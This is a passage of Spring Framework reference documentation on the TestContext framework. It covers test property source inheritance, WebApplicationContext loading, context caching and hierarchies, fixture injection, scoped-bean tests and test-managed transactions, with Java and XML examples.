body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e..,\noverride) properties of the same name that appear earlier. In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. `ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that is used to load it. Consequently, the unique combination\nof configuration parameters is used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextCustomizers` __(from ContextCustomizerFactory)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince Spring Framework 4.3, the size of the context cache is bounded with a default\nmaximum size of 32. Whenever the maximum size is reached, a _least recently used_ (LRU)\neviction policy is used to evict and close stale contexts. The maximum size can be\nconfigured from the command line or a build script by setting a JVM system property named\n`spring.test.context.cache.maxSize`. As an alternative, the same property can be set\nprogrammatically via the `SpringProperties` API.\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ``ApplicationContext``s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit 4 based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. The result is\nthat three application contexts will be loaded (one for each declaration of\n`@ContextConfiguration`), and the application context loaded based on the configuration\nin `AbstractWebTests` will be set as the parent context for each of the contexts loaded\nfor the concrete subclasses.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/applicationContext.xml\")\n\tpublic abstract class AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/soap-ws-config.xml\")\n\tpublic class SoapWebServiceTests extends AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/rest-ws-config.xml\")\n\tpublic class RestWebServiceTests extends AbstractWebTests {}\n----\n--\n\n\n.Class hierarchy with merged context hierarchy configuration\n--\nThe following classes demonstrate the use of __named__ hierarchy levels in order to\n__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`\ndefines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends\n`BaseTests` and instructs the Spring TestContext Framework to merge the context\nconfiguration for the `child` hierarchy level, simply by ensuring that the names\ndeclared via the `name` attribute in `@ContextConfiguration` are both `\"child\"`. The\nresult is that three application contexts will be loaded: one for `\"\/app-config.xml\"`,\none for `\"\/user-config.xml\"`, and one for `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\nAs with the previous example, the application context loaded from `\"\/app-config.xml\"`\nwill be set as the parent context for the contexts loaded from `\"\/user-config.xml\"`\nand `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/order-config.xml\")\n\t)\n\tpublic class ExtendedTests extends BaseTests {}\n----\n--\n\n.Class hierarchy with overridden context hierarchy configuration\n--\nIn contrast to the previous example, this example demonstrates how to __override__ the\nconfiguration for a given named level in a context hierarchy by setting the\n`inheritLocations` flag in `@ContextConfiguration` to `false`. Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<core.adoc#beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit 4. The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit 4 based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring since the early years, and since Spring 3.2 it's a breeze to test your\nrequest-scoped and session-scoped beans by following these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<core.adoc#expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<data-access.adoc#tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further 